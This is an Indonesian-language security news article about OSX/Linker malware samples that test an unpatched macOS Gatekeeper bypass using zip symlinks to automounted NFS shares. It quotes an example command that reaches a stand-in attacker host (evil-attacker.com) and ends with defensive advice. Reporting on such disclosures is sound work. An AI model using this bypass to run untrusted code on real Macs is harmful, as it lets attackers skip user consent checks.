Peneliti cybersecurity dari Intego memperingatkan tentang kemungkinan eksploitasi aktif dari kerentanan keamanan yang belum ditambal dalam rincian fitur keamanan Gatekeeper MacOS Apple dan PoC yang diungkapkan kepada publik akhir bulan lalu.
Tim Intego minggu lalu menemukan empat sampel malware macOS baru di VirusTotal yang memanfaatkan kerentanan bypass GateKeeper untuk mengeksekusi kode yang tidak dipercaya pada macOS tanpa menampilkan kepada pengguna peringatan atau meminta izin eksplisit dari mereka.
Namun, malware yang baru ditemukan, dijuluki OSX / Linker , belum terlihat di alam liar seperti sekarang dan tampaknya sedang dalam pengembangan. Meskipun sampel memanfaatkan cacat pintas Gatekeeper yang tidak ditambal, ia tidak mengunduh aplikasi jahat apa pun dari server penyerang.
Menurut Joshua Long dari Intego, sampai minggu lalu, "pembuat malware hanya melakukan beberapa pengintaian pengujian deteksi."
"Salah satu file ditandatangani dengan ID Pengembang Apple (seperti yang dijelaskan di bawah), jelas bahwa gambar disk OSX / Linker adalah hasil karya pengembang OSX / Surfbuyer adware," kata Long dalam posting blog.
Namun, karena sampel malware menghubungkan ke server jarak jauh dari tempat ia mengunduh aplikasi yang tidak dipercaya, penyerang juga dapat mendistribusikan sampel yang sama ke target nyata dengan hanya mengganti aplikasi sampel yang ditentukan dengan aplikasi malware di server mereka.
macOS Gatekeeper Bypass Kerentanan
GateKeeper adalah fitur keamanan yang dibangun di dalam Apple macOS yang memberlakukan penandatanganan kode dan memverifikasi aplikasi yang diunduh sebelum memungkinkannya untuk berjalan, membantu pengguna melindungi sistem mereka dari malware dan perangkat lunak berbahaya lainnya.
Itu berarti, jika Anda mengunduh aplikasi dari Internet, GateKeeper hanya akan mengizinkannya untuk mengeksekusi tanpa peringatan jika telah ditandatangani dengan sertifikat yang dikeluarkan Apple, jika tidak akan meminta Anda untuk mengizinkan atau menolak eksekusi.
Namun, Gatekeeper telah dirancang untuk memperlakukan kedua drive eksternal (USB atau HDD) dan jaringan berbagi sebagai "lokasi aman" dari mana pengguna dapat menjalankan aplikasi apa pun tanpa melibatkan pemeriksaan dan permintaan GateKeeper.
Filippo Cavallarin, seorang peneliti keamanan independen, akhir bulan lalu secara terbuka mengungkapkan cara untuk mengeksploitasi perilaku ini dengan menggabungkannya dengan dua fitur lain yang sah dari sistem operasi MacOS, yaitu:
arsip zip dapat berisi tautan simbolis yang menunjuk ke lokasi arbitrer, termasuk titik akhir automount, dan
fitur automount pada macOS dapat secara otomatis me-mount berbagi jaringan dari server jauh hanya dengan mengaksesnya dengan jalur "khusus" yaitu, dimulai dengan "/ net /. "
"Sebagai contoh, ls /net/evil-attacker.com/sharedfolder/ akan membuat OS membaca konten 'sharedfolder' pada host jarak jauh (evil-attacker.com) menggunakan NFS," jelas Cavallarin dalam posting blog.
Seperti yang diperlihatkan dalam demonstrasi video, Cavallarin membuat file ZIP dengan tautan simbolis ke jaringan yang dikontrol oleh penyerang yang macOS akan hasilkan secara otomatis.
Setelah korban membuka arsip ZIP dan mengikuti tautan, ia akan menavigasi ke jaringan yang dikendalikan penyerang yang dipercaya oleh Gatekeeper, menipu korban agar menjalankan file yang dapat dieksekusi berbahaya tanpa peringatan apa pun.
"Cara Finder dirancang (ex hide .app extensions, hide path lengkap dari title bar) membuat teknik ini sangat efektif dan sulit dikenali," kata peneliti.
Namun, sampel malware yang baru ditemukan bukanlah file ZIP, tetapi file gambar disk (dengan .dmg), menunjukkan bahwa "pembuat malware sedang bereksperimen untuk melihat apakah kerentanan Cavallarin akan bekerja dengan gambar disk juga."
Cavallarin secara bertanggung jawab melaporkan temuannya ke Apple pada 22 Februari tetapi memutuskan untuk go public akhir bulan lalu setelah perusahaan gagal menambal masalah dalam batas waktu pengungkapan 90 hari dan mulai mengabaikan email-emailnya.
Sampai Apple memperbaiki masalah ini, peneliti menyarankan administrator jaringan untuk memblokir komunikasi NFS dengan alamat IP eksternal, dan bagi pengguna rumahan, selalu penting untuk tidak membuka lampiran email dari sumber yang tidak dikenal, mencurigakan, atau tidak dapat dipercaya.
Sumber Artikel : TheHackerNews
